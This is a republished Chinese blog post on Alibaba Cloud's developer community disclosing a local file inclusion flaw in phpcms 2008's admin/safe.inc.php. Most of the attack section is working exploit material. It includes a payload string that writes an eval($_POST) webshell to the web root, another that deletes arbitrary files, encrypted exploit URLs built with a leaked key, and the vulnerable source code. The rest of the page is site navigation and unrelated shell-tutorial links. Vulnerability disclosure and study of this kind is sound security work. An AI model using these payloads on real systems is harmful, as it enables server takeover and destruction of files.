备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

2017-11-11 1671
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

 by c4rp3nt3r@0x50sec.org

phpcms2008 sp2 or sp4偶没仔细看
这年头发个bug伤不起啊,厂商忽略,被人当成装X,有木有,心情不爽啊不管这么多了。

phpcms本地包含拿shell的方法,这篇文章接上一个

http://www.wooyun.org/bugs/wooyun-2010-01795

《phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞》

phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话
用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’;
加密如下字符串
$evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马

同理任意文件删除漏洞:
$evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==


贴上存在漏洞的代码
//admin/safe.inc.php
<?php
defined(‘IN_PHPCMS’) or exit(‘Access Denied’);
// include/common.inc.php 里面声明了常量
// define(‘IN_PHPCMS’, TRUE);

if(empty($action)) $action = “start”;
$safe = cache_read(‘safe.php’);
$filecheck = load(‘filecheck.class.php’);
if(empty($safe))
{
$safe = array (
‘file_type’ => ‘php|js’,
‘code’ => ”,
‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’,
‘dir’ => $filecheck->checked_dirs()
);
}
switch ($action)
{

case ‘edit_code’:
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage(‘修改成功!’);
}
break;

case ‘del_file’:
$file_path = urldecode($files);

if (empty($file_path))
{
showmessage(‘请选择文件’);
}
$file_list = cache_read(‘scan_backdoor.php’);
unset($file_list[$file_path]);
cache_write(‘scan_backdoor.php’,$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage(‘文件删除成功!’, ‘?mod=phpcms&file=safe&action=scan_table’);
break;













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/537456,如需转载请自行联系原作者

文章标签:
Shell
安全
PHP
关键词:
Shell文件
Shell漏洞
技术小美
目录
相关文章
泡沫o0
|
28天前
|
Shell Linux API
【Shell 命令集合 备份压缩 】Linux 解压缩文件 unzip命令 使用指南
【Shell 命令集合 备份压缩 】Linux 解压缩文件 unzip命令 使用指南
泡沫o0
49 0
泡沫o0
|
28天前
|
Shell Linux C语言
【Shell 命令集合 备份压缩 】Linux 归档和解档文件 cpio命令 使用指南
【Shell 命令集合 备份压缩 】Linux 归档和解档文件 cpio命令 使用指南
泡沫o0
38 0
泡沫o0
|
28天前
|
算法 Linux Shell
【Shell 命令集合 备份压缩 】Linux 压缩.Z文件 compress命令 使用指南
【Shell 命令集合 备份压缩 】Linux 压缩.Z文件 compress命令 使用指南
泡沫o0
32 0
泡沫o0
|
28天前
|
Shell Linux C语言
【Shell 命令集合 设备管理 】Linux 创建设备文件 MAKEDEV命令 使用指南
【Shell 命令集合 设备管理 】Linux 创建设备文件 MAKEDEV命令 使用指南
泡沫o0
33 0
泡沫o0
|
28天前
|
存储 Shell Linux
【Shell 命令集合 磁盘管理 】Linux 压缩zip文件 mazip命令使用教程
【Shell 命令集合 磁盘管理 】Linux 压缩zip文件 mazip命令使用教程
泡沫o0
31 0
泡沫o0
|
28天前
|
Shell Linux C语言
【Shell 命令集合 系统设置 】Linux 创建Kickstart文件mkkickstart命令 使用指南
【Shell 命令集合 系统设置 】Linux 创建Kickstart文件mkkickstart命令 使用指南
泡沫o0
31 0
泡沫o0
|
28天前
|
存储 Shell Linux
【Shell 命令集合 备份压缩 】Linux 解码uuencode编码的文件 uudecode 命令 使用指南
【Shell 命令集合 备份压缩 】Linux 解码uuencode编码的文件 uudecode 命令 使用指南
泡沫o0
29 0
泡沫o0
|
28天前
|
安全 Shell Linux
【Shell 命令集合 备份压缩 】Linux将可执行文件压缩成gzip格式 gzexe命令 使用指南
【Shell 命令集合 备份压缩 】Linux将可执行文件压缩成gzip格式 gzexe命令 使用指南
泡沫o0
35 0
泡沫o0
|
28天前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 查看系统中的UUCP日志文件 uulog命令 使用指南
【Shell 命令集合 网络通讯 】Linux 查看系统中的UUCP日志文件 uulog命令 使用指南
泡沫o0
29 0
泡沫o0
|
28天前
|
Shell Linux API
【Shell 命令集合 磁盘维护 】Linux 查找指定目录下的所有符号链接文件 symlinks 命令使用教程
【Shell 命令集合 磁盘维护 】Linux 查找指定目录下的所有符号链接文件 symlinks 命令使用教程
泡沫o0
31 1

热门文章

最新文章

  • 1
    shell中for while until 三种循环的用法
  • 2
    【Shell 命令集合 网络通讯 】Linux 管理Apache HTTP服务器 apachectl命令 使用教程
  • 3
    【Shell 命令集合 文件管理】Linux 更新locate命令所使用的数据库 updatedb命令解析
  • 4
    ecs服务器shell常用脚本练习(十)
  • 5
    ecs服务器shell常用脚本练习(九)
  • 6
    ecs服务器shell常用脚本练习(二)
  • 7
    性能工具之 JMeter 使用 shell 脚本快速执行
  • 8
    【Shell 命令集合 备份压缩 】Linux 解压缩文件 unzip命令 使用指南
  • 9
    【Shell 命令集合 文件管理】Linux 将多个文件的内容按列合并 paste命令使用指南
  • 10
    【Shell 命令集合 系统设置 】Linux 软件包管理工具 rpm命令 使用指南
  • 1
    【Linux】浅谈shell命令以及运行原理
    41
  • 2
    Linux--自定义shell
    24
  • 3
    通用Shell脚本执行Spring Boot项目Jar包
    26
  • 4
    Java调用shell脚本实现数据库备份功能
    25
  • 5
    什么是计算机软件领域的 shell app
    14
  • 6
    利用Shell脚本自动化员工电脑监管软件的部署流程
    129
  • 7
    供应链投毒预警 | 恶意NPM包利用Windows反向shell后门攻击开发者
    32
  • 8
    【Linux】shell命令以及运行原理
    43
  • 9
    上传Joomal网站的Shell
    20
  • 10
    使用shell脚本给日志文件瘦身
    43

    • 相关课程

    更多
  • Linux Shell 编程
  • Shell 脚本进阶
  • Shell 脚本入门
  • Linux Shell 编程入门与实战
  • Shell 编程入门到精通

    • 相关电子书

    更多
  • Shell 脚本速查手册
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • Alibaba Cloud Linux操作系统Shell程序
  • 1分钟代码漏洞自动检测
    • 下一篇
    阿里云oss简介和使用流程